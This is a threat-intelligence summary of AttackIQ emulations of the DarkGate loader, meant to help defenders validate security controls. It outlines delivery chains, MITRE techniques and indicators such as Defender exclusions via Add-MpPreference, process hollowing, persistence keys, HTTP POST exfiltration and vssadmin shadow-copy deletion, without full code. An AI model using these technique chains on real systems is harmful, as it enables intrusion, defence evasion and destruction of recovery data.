Emulating the Ever-Evolving Loader DarkGate

AttackIQ published three attack graphs that emulate DarkGate activity observed in 2023, covering delivery chains (Teams/Skype phishing, SEO poisoning, drive-by downloads, and malicious email) and post-compromise behaviors like process hollowing, Defender exclusion, persistence, discovery, exfiltration, and lateral movement. These scenarios reproduce DarkGate’s use of MSI/VBS/AutoIt/Delphi loaders and the deployment of secondary payloads such as DanaBot to help validate detection and prevention controls. #DarkGate #DanaBot

Keypoints

AttackIQ released three attack graphs that model DarkGate campaigns from 2023 to validate security controls.
Delivery methods reproduced include Microsoft Teams/Skype phishing, SEO poisoning, drive-by downloads, and fake invoice emails.
Typical loader chain: ZIP/LNK → VBS → AutoIt script hosting a Delphi loader or CAB → Internet shortcut → MSI executed via msiexec.
Defense-evasion techniques emulated: adding Defender exclusions, process hollowing, DLL side‑loading, and parent PID spoofing.
Persistence and configuration changes: registry Run/RunOnce keys, Startup folder shortcuts, and Terminal Services registry modifications.
Discovery and exfiltration steps: registry and API queries, systeminfo, tasklist, ipconfig/route, WMIC AV enumeration, WebCache extraction, and HTTP POST exfiltration.
Lateral movement and cleanup: RDP-based lateral movement, creation of local accounts, and deletion of Volume Shadow Copies via vssadmin.

MITRE Techniques

[T1105] Ingress Tool Transfer – Downloads payloads to memory and disk to test delivery controls (‘This scenario downloads to memory and saves to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious files.’)
[T1059.003] Command and Scripting Interpreter: Windows Command Shell – Executes scripts via cscript.exe (‘This scenario will validate if it is possible to execute a JavaScript file via cscript.exe.’)
[T1562.001] Impair Defenses: Disable or Modify Tools – Adds Defender exclusions using Add-MpPreference (‘This scenario will execute the Add-MpPreference PowerShell cmdlet to add the %TEMP%aiq-temp-exclusion directory path to the exclusion list in Microsoft Defender.’)
[T1055.012] Process Injection: Process Hollowing – Replaces a suspended process memory with malicious executable to mask code execution (‘This scenario creates a process in a suspended state and unmaps its memory, which is then replaced with the contents of a malicious executable.’)
[T1547.001] Logon Autostart Execution: Registry Run Keys / Startup Folder – Establishes persistence via Run/RunOnce keys and Startup folder LNKs (‘This scenario sets the HKLMSoftwareMicrosoftWindowsCurrentVersionRun and RunOnce registry keys…’ and ‘This scenario creates a LNK file in this directory that would execute at the next Logon for all users.’)
[T1112] Modify Registry – Changes Terminal Services registry values to alter RDP settings (‘The HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindows NTTerminal ServicesDisableRemoteDesktopAntiAlias registry value is modified…’)
[T1012] Query Registry – Reads registry keys for hardware and user information (‘The HKEY_LOCAL_MACHINEHARDWAREDESCRIPTIONSystemCentralProcessor registry key is queried to collect information related to the system’s processor.’)
[T1082] System Information Discovery – Uses systeminfo and GetComputerNameA to gather system details (‘The native systeminfo command is executed to discover the basic details about the compromised system.’ and ‘GetComputerNameA Windows API to retrieve a NetBIOS name’)
[T1614] System Location Discovery – Calls Windows APIs to retrieve locale/location (‘GetUserDefaultLocaleName and GetUserDefaultLCID Windows APIs to retrieve the location of the compromised system.’)
[T1120] Peripheral Device Discovery – Uses GetDriveTypeA to identify drive types (‘This scenario executes the GetDriveTypeA Windows API to discover the drive type of the compromised system.’)
[T1083] File and Directory Discovery – Uses dir to enumerate files and output results to temp files (‘This scenario uses the native dir command to find files of interest and output to a temporary file.’)
[T1518.001] Security Software Discovery – Uses WMIC to enumerate AntiVirusProduct classes (‘A native Microsoft Windows WMIC is executed to determine which software has been installed as an AntiVirusProduct class.’)
[T1016] System Network Configuration Discovery – Runs route, ipconfig, and net use to collect network details (‘Native Window’s commands such as route, ipconfig, and net use are executed to collect details about the infected host and network shares.’)
[T1057] Process Discovery – Uses tasklist to enumerate running processes (‘This scenario executes the Window’s built-in tasklist command to discover running processes on the compromised system.’)
[T1217] Browser Bookmark Discovery – Extracts WebCache database copies via esentutl to harvest browser data (‘a PowerShell script … attempt to flush the data from the WebCache log files back to the WebCacheV01 database … a copy of the database will be made to a temporary directory.’)
[T1041] Exfiltration Over C2 Channel – Sends files to attacker server via HTTP POST (‘Files are sent to an AttackIQ controlled server using HTTP POST requests.’)
[T1021.001] Remote Services: Remote Desktop Protocol – Attempts RDP-based lateral movement to other hosts (‘This scenario attempts to use Remote Desktop to move laterally to additional hosts available on the compromised network.’)
[T1136.001] Create Account: Local Account – Creates local accounts for persistence using net user (‘This scenario will create a new local account using net user to ensure persistence on the newly compromised systems.’)
[T1490] Inhibit System Recovery – Deletes Volume Shadow Copies using vssadmin.exe (‘This scenario executes the vssadmin.exe utility to delete a recently created Volume Shadow Copy.’)
[T1218.007] System Binary Proxy Execution: Msiexec – Executes MSI payloads via msiexec.exe (‘This scenario executes a Windows Installer Package (MSI) using the msiexec.exe utility.’)
[T1055] Process Injection (general) – Injects DLLs into running processes (‘This scenario injects a DLL file into another running process and validates if a canary file can be created.’)
[T1134.004] Access Token Manipulation: Parent PID Spoofing – Creates processes that appear spawned by legitimate processes using CreateProcess (‘This scenario calls the CreateProcess Windows API which allows it to specify which parent process should be responsible for this new process.’)
[T1574.002] Hijack Execution Flow: DLL Side-Loading – Drops dbgeng.dll and uses side-loading to execute decoded AutoIT script (‘This DLL…is executed using the DLL Side-Loading technique, carries out the task of decoding a piece of information which turns out to be an AutoIT script.’)
[T1546.001] Boot or Logon Autostart Execution (Registry/Startup) – Highlighted as a prioritised detection/mitigation focus for preventing persistence (‘Preventing an actor from maintaining a foothold in your environment should always be one of the top priorities. During these activities, the adversary used registry keys to achieve persistence.’)

Indicators of Compromise

[File names] Loader and runtime artifacts – dbgeng.dll, msiexec.exe (used to execute MSI), and vssadmin.exe (used to delete shadows).
[File types] Delivery artifacts and scripts – .zip containing .lnk, .vbs, .msi, .cab, and AutoIt (.au3) scripts.
[Registry keys/values] Persistence and config changes – HKLMSoftwareMicrosoftWindowsCurrentVersionRun, RunOnce, and HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindows NTTerminal ServicesDisableRemoteDesktopAntiAlias.
[Directories/Exclusions] Defender exclusion path – %TEMP%aiq-temp-exclusion (added via Add-MpPreference to evade detection).
[Processes/Commands] Execution and discovery commands – cscript.exe, msiexec.exe, tasklist, systeminfo, ipconfig/route, net use, and net user.
[Data stores] Browser cache extraction target – WebCacheV01 database (copied for bookmark/browser data extraction).

Delivery chains reproduced by AttackIQ begin with social-engineered or browser-triggered downloads: ZIP archives containing LNK shortcuts that drop VBS scripts (opened via cscript.exe), CAB files with Internet shortcuts that retrieve MSI installers, and drive-by fake installers that launch AutoIt scripts. These intermediary artifacts consistently lead to execution of an AutoIt script that hosts a Delphi-based loader, which in turn deploys the final payload (e.g., DarkGate or secondary DanaBot payloads) and may be executed via msiexec or script interpreters.

Post‑execution techniques focus on defense evasion, persistence, and masquerading: the scenarios add Defender exclusions (Add‑MpPreference to %TEMP%aiq-temp-exclusion), perform process hollowing and DLL side‑loading (e.g., dbgeng.dll) to hide execution, and use parent PID spoofing to make malicious processes appear spawned by legitimate binaries. Persistence is achieved through registry Run/RunOnce keys and Startup folder LNKs, and attackers modify Terminal Services registry values to change RDP settings.

For reconnaissance, the emulations run registry queries and Windows APIs (GetComputerNameA, GetUserDefaultLocaleName, GetDriveTypeA), use native commands (systeminfo, tasklist, ipconfig, route, dir, WMIC AntiVirusProduct), extract browser WebCache data, and exfiltrate collected files via HTTP POST to C2. Lateral movement uses RDP and net user to create local accounts, and final clean-up or disruption steps include vssadmin.exe to delete Volume Shadow Copies.

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print